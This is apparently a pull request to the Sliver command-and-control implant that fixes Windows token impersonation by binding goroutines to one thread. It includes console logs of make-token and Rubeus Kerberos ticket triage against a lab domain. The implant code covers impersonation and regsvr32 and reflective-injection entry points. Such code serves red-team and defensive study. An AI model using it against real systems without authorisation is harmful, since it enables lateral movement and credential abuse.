### PR TITLE
improved token management

### DIFF
--- a/implant/sliver/handlers/handlers_windows.go
+++ b/implant/sliver/handlers/handlers_windows.go
@@ -24,6 +24,7 @@ import (
 	"fmt"
 	"io"
 	"os"
+	"runtime"
 
 	// {{if .Config.Debug}}
 	"log"
@@ -37,6 +38,7 @@ import (
 	"github.com/bishopfox/sliver/implant/sliver/registry"
 	"github.com/bishopfox/sliver/implant/sliver/service"
 	"github.com/bishopfox/sliver/implant/sliver/spoof"
+	"github.com/bishopfox/sliver/implant/sliver/syscalls"
 	"github.com/bishopfox/sliver/implant/sliver/taskrunner"
 	"github.com/bishopfox/sliver/protobuf/commonpb"
 	"github.com/bishopfox/sliver/protobuf/sliverpb"
@@ -118,6 +120,28 @@ var (
 // GetSystemHandlers - Returns a map of the windows system handlers
 func GetSystemHandlers() map[uint32]RPCHandler {
 	return windowsHandlers
+}
+
+func WrapperHandler(handler RPCHandler, data []byte, resp RPCResponse) {
+	if priv.CurrentToken != 0 {
+		err := syscalls.ImpersonateLoggedOnUser(priv.CurrentToken)
+		if err != nil {
+			// {{if .Config.Debug}}
+			log.Printf("Error: %v\n", err)
+			// {{end}}
+		}
+		runtime.LockOSThread()
+		defer runtime.UnlockOSThread()
+	}
+	handler(data, resp)
+	if priv.CurrentToken != 0 {
+		err := priv.TRevertToSelf()
+		if err != nil {
+			// {{if .Config.Debug}}
+			log.Printf("Error: %v\n", err)
+			// {{end}}
+		}
+	}
 }
 
 // ---------------- Windows Handlers ----------------

--- a/implant/sliver/priv/priv_windows.go
+++ b/implant/sliver/priv/priv_windows.go
@@ -96,7 +96,23 @@ func SePrivEnable(s string) error {
 }
 
 func RevertToSelf() error {
+	err := windows.RevertToSelf()
+	if err != nil {
+		// {{if .Config.Debug}}
+		log.Printf("RevertToSelf Error: %v\n", err)
+		// {{end}}
+	}
+	err = windows.CloseHandle(windows.Handle(CurrentToken))
+	if err != nil {
+		// {{if .Config.Debug}}
+		log.Printf("CloseHandle Error: %v\n", err)
+		// {{end}}
+	}
 	CurrentToken = windows.Token(0)
+	return err
+}
+
+func TRevertToSelf() error {
 	return windows.RevertToSelf()
 }
 

--- a/implant/sliver/sliver.go
+++ b/implant/sliver/sliver.go
@@ -42,17 +42,11 @@ import (
 	"io/ioutil"
 	// {{end}}
 
-	// {{if eq .Config.GOOS "windows"}}
-	"github.com/bishopfox/sliver/implant/sliver/priv"
-	"github.com/bishopfox/sliver/implant/sliver/syscalls"
-
-	// {{end}}
-
 	consts "github.com/bishopfox/sliver/implant/sliver/constants"
 	"github.com/bishopfox/sliver/implant/sliver/handlers"
 	"github.com/bishopfox/sliver/implant/sliver/hostuuid"
-	"github.com/bishopfox/sliver/implant/sliver/locale"
 	"github.com/bishopfox/sliver/implant/sliver/limits"
+	"github.com/bishopfox/sliver/implant/sliver/locale"
 	"github.com/bishopfox/sliver/implant/sliver/pivots"
 	"github.com/bishopfox/sliver/implant/sliver/transports"
 	"github.com/bishopfox/sliver/implant/sliver/version"
@@ -127,6 +121,7 @@ func (serv *sliverService) Execute(args []string, r <-chan svc.ChangeRequest, ch
 var isRunning bool = false
 
 // StartW - Export for shared lib build
+//
 //export StartW
 func StartW() {
 	if !isRunning {
@@ -139,21 +134,25 @@ func StartW() {
 //https://github.com/Ne0nd0g/merlin/blob/master/cmd/merlinagentdll/main.go#L65
 
 // VoidFunc is an exported function used with PowerSploit's Invoke-ReflectivePEInjection.ps1
+//
 //export VoidFunc
 func VoidFunc() { main() }
 
 // DllInstall is used when executing the Sliver implant with regsvr32.exe (i.e. regsvr32.exe /s /n /i sliver.dll)
 // https://msdn.microsoft.com/en-us/library/windows/desktop/bb759846(v=vs.85).aspx
+//
 //export DllInstall
 func DllInstall() { main() }
 
 // DllRegisterServer - is used when executing the Sliver implant with regsvr32.exe (i.e. regsvr32.exe /s sliver.dll)
 // https://msdn.microsoft.com/en-us/library/windows/desktop/ms682162(v=vs.85).aspx
+//
 //export DllRegisterServer
 func DllRegisterServer() { main() }
 
 // DllUnregisterServer - is used when executing the Sliver implant with regsvr32.exe (i.e. regsvr32.exe /s /u sliver.dll)
 // https://msdn.microsoft.com/en-us/library/windows/desktop/ms691457(v=vs.85).aspx
+//
 //export DllUnregisterServer
 func DllUnregisterServer() { main() }
 
@@ -409,6 +408,23 @@ func beaconMain(beacon *transports.Beacon, nextCheckin time.Time) error {
 			wg.Add(1)
 			data := task.Data
 			taskID := task.ID
+			// {{if eq .Config.GOOS "windows" }}
+			go handlers.WrapperHandler(handler, data, func(data []byte, err error) {
+				resultsMutex.Lock()
+				defer resultsMutex.Unlock()
+				defer wg.Done()
+				// {{if .Config.Debug}}
+				if err != nil {
+					log.Printf("[beacon] handler function returned an error: %s", err)
+				}
+				log.Printf("[beacon] task completed (id: %d)", taskID)
+				// {{end}}
+				results = append(results, &sliverpb.Envelope{
+					ID:   taskID,
+					Data: data,
+				})
+			})
+			//  {{else}}
 			go handler(data, func(data []byte, err error) {
 				resultsMutex.Lock()
 				defer resultsMutex.Unlock()
@@ -424,6 +440,7 @@ func beaconMain(beacon *transports.Beacon, nextCheckin time.Time) error {
 					Data: data,
 				})
 			})
+			// {{end}}
 		} else if task.Type == sliverpb.MsgOpenSession {
 			go openSessionHandler(task.Data)
 			resultsMutex.Lock()
@@ -566,20 +583,23 @@ func sessionMainLoop(connection *transports.Connection) error {
 			// only applies the token to the calling thread, we need to call it before every task.
 			// It's fucking gross to do that here, but I could not come with a better solution.
 
-			// {{if eq .Config.GOOS "windows" }}
-			if priv.CurrentToken != 0 {
-				err := syscalls.ImpersonateLoggedOnUser(priv.CurrentToken)
-				if err != nil {
-					// {{if .Config.Debug}}
-					log.Printf("Error: %v\n", err)
-					// {{end}}
-				}
-			}
-			// {{end}}
-
 			// {{if .Config.Debug}}
 			log.Printf("[recv] sysHandler %d", envelope.Type)
 			// {{end}}
+
+			// {{if eq .Config.GOOS "windows" }}
+			go handlers.WrapperHandler(handler, envelope.Data, func(data []byte, err error) {
+				// {{if .Config.Debug}}
+				if err != nil {
+					log.Printf("[session] handler function returned an error: %s", err)
+				}
+				// {{end}}
+				connection.Send <- &sliverpb.Envelope{
+					ID:   envelope.ID,
+					Data: data,
+				}
+			})
+			// {{else}}
 			go handler(envelope.Data, func(data []byte, err error) {
 				// {{if .Config.Debug}}
 				if err != nil {
@@ -591,6 +611,7 @@ func sessionMainLoop(connection *transports.Connection) error {
 					Data: data,
 				}
 			})
+			// {{end}}
 		} else if handler, ok := tunHandlers[envelope.Type]; ok {
 			// {{if .Config.Debug}}
 			log.Printf("[recv] tunHandler %d", envelope.Type)


### PR DESCRIPTION
#### Card

I noticed there are some issues in token management, in particular when it comes to creating a sacrificial logon session with `make-token` command. With this PR I may have solved the issue by forcing the goroutine to use always the same thread, in which it was called `ImpersonateLoggedOnUser`, only when necessary. In addition i modified the `Rev2Self` to also close the Handle to the token.

#### Details

If you try to run `make-token` and then `rubeus --in-process triage` you may notice that the `LUID` showed in the rubeus command changes unexpectedly.
Here an example:
```
sliver (SYMBOLIC_FLAME) > rubeus --in-process triage

[*] Tasked beacon SYMBOLIC_FLAME (4af33f0f)

[+] SYMBOLIC_FLAME completed task 4af33f0f

[*] rubeus output:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0x91bb1

 ---------------------------------------------------------------------------------------------------------------------
 | LUID    | UserName                      | Service                                          | EndTime              |
 ---------------------------------------------------------------------------------------------------------------------
 | 0x91bb1 | nonPrivileged @ CONTOSO.LOCAL | krbtgt/CONTOSO.LOCAL                             | 11/9/2022 7:05:57 PM |
 | 0x91bb1 | nonPrivileged @ CONTOSO.LOCAL | LDAP/WIN-ICSQJ44N1F3.contoso.local/contoso.local | 11/9/2022 7:05:57 PM |
 ---------------------------------------------------------------------------------------------------------------------



sliver (SYMBOLIC_FLAME) > make-token -d CONTOSO -u user -p pass

[*] Tasked beacon SYMBOLIC_FLAME (636b9d85)

[+] SYMBOLIC_FLAME completed task 636b9d85



sliver (SYMBOLIC_FLAME) > rubeus --in-process triage

[*] Tasked beacon SYMBOLIC_FLAME (c5acf5d4)

[+] SYMBOLIC_FLAME completed task c5acf5d4

[*] rubeus output:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0x522b1c

 ---------------------------------------
 | LUID | UserName | Service | EndTime |
 ---------------------------------------
 ---------------------------------------



sliver (SYMBOLIC_FLAME) > rubeus --in-process triage

[*] Tasked beacon SYMBOLIC_FLAME (fcacb96f)

[+] SYMBOLIC_FLAME completed task fcacb96f

[*] rubeus output:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0x522b1c

 ---------------------------------------
 | LUID | UserName | Service | EndTime |
 ---------------------------------------
 ---------------------------------------



sliver (SYMBOLIC_FLAME) > rubeus --in-process triage

[*] Tasked beacon SYMBOLIC_FLAME (23bdad73)

[+] SYMBOLIC_FLAME completed task 23bdad73

[*] rubeus output:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0x91bb1

 ---------------------------------------------------------------------------------------------------------------------
 | LUID    | UserName                      | Service                                          | EndTime              |
 ---------------------------------------------------------------------------------------------------------------------
 | 0x91bb1 | nonPrivileged @ CONTOSO.LOCAL | krbtgt/CONTOSO.LOCAL                             | 11/9/2022 7:05:57 PM |
 | 0x91bb1 | nonPrivileged @ CONTOSO.LOCAL | LDAP/WIN-ICSQJ44N1F3.contoso.local/contoso.local | 11/9/2022 7:05:57 PM |
 ---------------------------------------------------------------------------------------------------------------------



sliver (SYMBOLIC_FLAME) >
```
As you can see before make-token LUID is `0x91bb1`. After running make-token a new LUID is created `0x522b1c` running rubeus first time. The third time after `make-token` instead rubeus shows again that the LUID is `0x91bb1`.
This probably happens because the goroutine executing the handler gets assigned a random thread. In order to solve the issue I use `runtime.LockOSThread()` in order to bound the goroutine to the same thread. Before calling `runtime.LockOSThread()` `ImpersonateLoggedOnUser` in order to set the token in the goroutine thread. The bounding of the goroutine to the same thread with `runtime.LockOSThread()` is applied only for `sysHandlers` when the variable `priv.CurrenToken` is different from 0.
With the modification in the PR here is the behaviour:
```
[server] sliver (VISUAL_SWATH) > rubeus -E -M --in-process triage

[*] Tasked beacon VISUAL_SWATH (fb1f829c)

[+] VISUAL_SWATH completed task fb1f829c

[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0x91bb1

 ---------------------------------------------------------------------------------------------------------------------- 
 | LUID    | UserName                      | Service                                          | EndTime               |
 ---------------------------------------------------------------------------------------------------------------------- 
 | 0x91bb1 | nonPrivileged @ CONTOSO.LOCAL | krbtgt/CONTOSO.LOCAL                             | 11/9/2022 10:17:32 PM |
 | 0x91bb1 | nonPrivileged @ CONTOSO.LOCAL | LDAP/WIN-ICSQJ44N1F3.contoso.local/contoso.local | 11/9/2022 10:17:32 PM |
 ---------------------------------------------------------------------------------------------------------------------- 



[server] sliver (VISUAL_SWATH) > make-token -d CONTOSO -u user -p pass

[*] Tasked beacon VISUAL_SWATH (81e2e5b1)

[+] VISUAL_SWATH completed task 81e2e5b1



[server] sliver (VISUAL_SWATH) > rubeus --in-process triage

[*] Tasked beacon VISUAL_SWATH (da81fa98)

[+] VISUAL_SWATH completed task da81fa98

[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0xa71711

 --------------------------------------- 
 | LUID | UserName | Service | EndTime |
 --------------------------------------- 
 --------------------------------------- 



[server] sliver (VISUAL_SWATH) > rubeus --in-process triage

[*] Tasked beacon VISUAL_SWATH (7e9a436a)

[+] VISUAL_SWATH completed task 7e9a436a

[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0xa71711

 --------------------------------------- 
 | LUID | UserName | Service | EndTime |
 --------------------------------------- 
 --------------------------------------- 



[server] sliver (VISUAL_SWATH) > rubeus --in-process triage

[*] Tasked beacon VISUAL_SWATH (c58005ac)

[+] VISUAL_SWATH completed task c58005ac

[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0xa71711

 --------------------------------------- 
 | LUID | UserName | Service | EndTime |
 --------------------------------------- 
 --------------------------------------- 



[server] sliver (VISUAL_SWATH) > rubeus --in-process triage

[*] Tasked beacon VISUAL_SWATH (087100d7)

[+] VISUAL_SWATH completed task 087100d7

[*] rubeus output:


[server] sliver (VISUAL_SWATH) > rubeus --in-process triage

[*] Tasked beacon VISUAL_SWATH (70d40f14)

[+] VISUAL_SWATH completed task 70d40f14

[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0xa71711

 --------------------------------------- 
 | LUID | UserName | Service | EndTime |
 --------------------------------------- 
 --------------------------------------- 



[server] sliver (VISUAL_SWATH) > rubeus --in-process triage

[*] Tasked beacon VISUAL_SWATH (b774e545)

[+] VISUAL_SWATH completed task b774e545

[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0xa71711

 --------------------------------------- 
 | LUID | UserName | Service | EndTime |
 --------------------------------------- 
 --------------------------------------- 


   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0xa71711

 --------------------------------------- 
 | LUID | UserName | Service | EndTime |
 --------------------------------------- 
 --------------------------------------- 



[server] sliver (VISUAL_SWATH) > rev2self

[*] Tasked beacon VISUAL_SWATH (51ac314f)

[+] VISUAL_SWATH completed task 51ac314f


[server] sliver (VISUAL_SWATH) > rubeus --in-process triage

[*] Tasked beacon VISUAL_SWATH (7a730884)

[+] VISUAL_SWATH completed task 7a730884

[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.1 


Action: Triage Kerberos Tickets (Current User)

[*] Current LUID    : 0x91bb1

 ---------------------------------------------------------------------------------------------------------------------- 
 | LUID    | UserName                      | Service                                          | EndTime               |
 ---------------------------------------------------------------------------------------------------------------------- 
 | 0x91bb1 | nonPrivileged @ CONTOSO.LOCAL | krbtgt/CONTOSO.LOCAL                             | 11/9/2022 10:17:32 PM |
 | 0x91bb1 | nonPrivileged @ CONTOSO.LOCAL | LDAP/WIN-ICSQJ44N1F3.contoso.local/contoso.local | 11/9/2022 10:17:32 PM |
 ---------------------------------------------------------------------------------------------------------------------- 



[server] sliver (VISUAL_SWATH) >
```

You can see now that after `make-token`, when `rubeus --in-process triage` is executed the LUID remains `0xa71711`. After `rev2self` the LUID displayed is the previous one.

In addition I've modified `Rev2Self` so that it closes the handle to the token, while I introduced `TRev2Self` that just calls `syscalls.RevToSelf()` from win32 API.